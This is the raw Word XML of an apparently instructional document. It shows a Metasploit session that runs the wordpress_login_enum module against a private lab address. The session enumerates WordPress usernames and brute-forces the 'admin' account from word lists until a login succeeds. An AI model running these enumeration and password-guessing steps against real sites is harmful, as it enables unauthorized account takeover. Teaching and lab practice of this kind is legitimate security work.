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A850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EFEFE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msf auxiliary(</w:t>
      </w:r>
      <w:r w:rsidRPr="00B93B5F">
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu Mono" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu Mono" w:cs="Courier New"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>scanner/http/</w:t>
      </w:r>
      <w:r w:rsidRPr="002D5758">
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu Mono" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu Mono" w:cs="Courier New"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>wordpress_login_enum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)</w:t>
      </w:r>
      <w:r w:rsidRPr="002D5758">
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu Mono" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu Mono" w:cs="Courier New"/>
          <w:color w:val="FEFEFE"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; 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set URI /wordpress/wp-login.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6810E964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URI =&gt; /wordpress/wp-login.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD6837B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EFEFE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msf auxiliary(</w:t>
      </w:r>
      <w:r w:rsidRPr="00B93B5F">
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu Mono" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu Mono" w:cs="Courier New"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>scanner/http/</w:t>
      </w:r>
      <w:r w:rsidRPr="002D5758">
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu Mono" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu Mono" w:cs="Courier New"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>wordpress_login_enum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)</w:t>
      </w:r>
      <w:r w:rsidRPr="002D5758">
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu Mono" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu Mono" w:cs="Courier New"/>
          <w:color w:val="FEFEFE"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; 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set PASS_FILE /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Desktop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/passes.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F7F03F1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PASS_FILE =&gt; /</w:t>
      </w:r>
      <w:r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Desktop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/passes.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C6EA92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EFEFE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msf auxiliary</w:t>
      </w:r>
      <w:r w:rsidRPr="002D5758">
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu Mono" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu Mono" w:cs="Courier New"/>
          <w:color w:val="FEFEFE"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00B93B5F">
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu Mono" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu Mono" w:cs="Courier New"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>scanner/http/</w:t>
      </w:r>
      <w:r w:rsidRPr="002D5758">
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu Mono" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu Mono" w:cs="Courier New"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>wordpress_login_enum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)</w:t>
      </w:r>
      <w:r w:rsidRPr="002D5758">
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu Mono" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu Mono" w:cs="Courier New"/>
          <w:color w:val="FEFEFE"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; 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set USER_FILE /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Desktop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/users.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7821E1D1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USER_FILE =&gt; /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Desktop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/users.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E0F5A7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EFEFE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msf auxiliary(</w:t>
      </w:r>
      <w:r w:rsidRPr="00B93B5F">
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu Mono" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu Mono" w:cs="Courier New"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>scanner/http/</w:t>
      </w:r>
      <w:r w:rsidRPr="002D5758">
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu Mono" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu Mono" w:cs="Courier New"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>wordpress_login_enum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)</w:t>
      </w:r>
      <w:r w:rsidRPr="002D5758">
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu Mono" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu Mono" w:cs="Courier New"/>
          <w:color w:val="FEFEFE"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; 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set RHOSTS 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</w:p>
    <w:p w14:paraId="3F3CE2B5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RHOSTS =&gt; 192.168.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29.89</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD207D5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EFEFE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msf auxiliary(</w:t>
      </w:r>
      <w:r w:rsidRPr="00B93B5F">
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu Mono" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu Mono" w:cs="Courier New"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>scanner/http/</w:t>
      </w:r>
      <w:r w:rsidRPr="002D5758">
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu Mono" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu Mono" w:cs="Courier New"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>wordpress_login_enum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) &gt; run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D833432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EFEFE"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D763662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[*] http://192.168.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Enumeration - Running User Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B112DBC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[*] http://192.168.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Enumeration - Checking Username:'administrator'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D1460DB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[-] http://192.168.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Enumeration - Invalid Username: 'administrator'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D4B06A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[*] http://192.168.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Enumeration - Checking Username:'admin'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="178099EB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FFFF00"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>[+]</w:t>
      </w:r>
      <w:r w:rsidRPr="002D5758">
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu Mono" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu Mono" w:cs="Courier New"/>
          <w:color w:val="FEFEFE"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> 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http://192.168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Enumeration- Username: 'admin' - is VALID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B9D83D2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[*] http://192.168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Enumeration - Checking Username:'root'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D6D2A7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[-] http://192.168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Enumeration - Invalid Username: 'root'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="605C0F75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[*] http://192.168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Enumeration - Checking Username:'god'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C9DD96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[-] http://192.168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Enumeration - Invalid Username: 'god'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4946946A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FFFF00"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>[+]</w:t>
      </w:r>
      <w:r w:rsidRPr="002D5758">
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu Mono" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu Mono" w:cs="Courier New"/>
          <w:color w:val="FEFEFE"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> 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http://192.168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Enumeration - Found 1 valid user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B886F1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[*] http://192.168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Brute Force - Running Bruteforce</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="491D9C9F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[*] http://192.168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Brute Force - Skipping all but 1 valid user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="100E6E22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[*] http://192.168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Brute Force - Trying username:'admin' with password:''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A3D72F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[-] http://192.168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Brute Force - Failed to login as 'admin'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C82EED4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[*] http://192.168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Brute Force - Trying username:'admin' with password:'root'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7611232A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[-] http://192.168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Brute Force - Failed to login as 'admin'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A7EEEAF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[*] http://192.168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Brute Force - Trying username:'admin' with password:'admin'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42975CC2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[-] http://192.168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Brute Force - Failed to login as 'admin'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43CE4642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[*] http://192.168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Brute Force - Trying username:'admin' with password:'god'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B6A2C44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[-] http://192.168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Brute Force - Failed to login as 'admin'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="133101D3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[*] http://192.168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Brute Force - Trying username:'admin' with password:'s3cr3t'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A1FBC50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FFFF00"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>[+]</w:t>
      </w:r>
      <w:r w:rsidRPr="002D5758">
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu Mono" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu Mono" w:cs="Courier New"/>
          <w:color w:val="FEFEFE"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> 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http://192.168</w:t>
      </w:r>
      <w:r w:rsidRPr="00B93B5F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.29.89</w:t>
      </w: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:80/wordpress/wp-login.php - WordPress Brute Force - SUCCESSFUL login for 'admin' : 's3cr3t'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E883FE7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[*] Scanned 1 of 1 hosts (100% complete)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C08378B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[*] Auxiliary module execution completed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="024792F0" w14:textId="77777777" w:rsidR="001B4721" w:rsidRPr="002D5758" w:rsidRDefault="001B4721" w:rsidP="001B4721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EFEFE"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D5758">
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu Mono" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu Mono" w:cs="Courier New"/>
          <w:color w:val="BFBFBF" w:themeColor="background1" w:themeShade="BF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>msf auxiliary</w:t>
      </w:r>
      <w:r w:rsidRPr="002D5758">
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu Mono" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu Mono" w:cs="Courier New"/>
          <w:color w:val="FEFEFE"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00B93B5F">
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu Mono" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu Mono" w:cs="Courier New"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>scanner/http/</w:t>
      </w:r>
      <w:r w:rsidRPr="002D5758">
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu Mono" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu Mono" w:cs="Courier New"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>wordpress_login_enum</w:t>
      </w:r>
      <w:r w:rsidRPr="002D5758">
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu Mono" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu Mono" w:cs="Courier New"/>
          <w:color w:val="FEFEFE"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>) &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E0A96B0" w14:textId="77777777" w:rsidR="00BC3404" w:rsidRDefault="00BC3404"/>
    <w:sectPr w:rsidR="00BC3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BC"/>
    <w:rsid w:val="001B4721"/>
    <w:rsid w:val="00436DBC"/>
    <w:rsid w:val="00B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E9625-AD47-426A-B977-3ADE8679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2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-11-12T03:17:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-11-12T03:17:00Z</dcterms:modified>
</cp:coreProperties>
</file>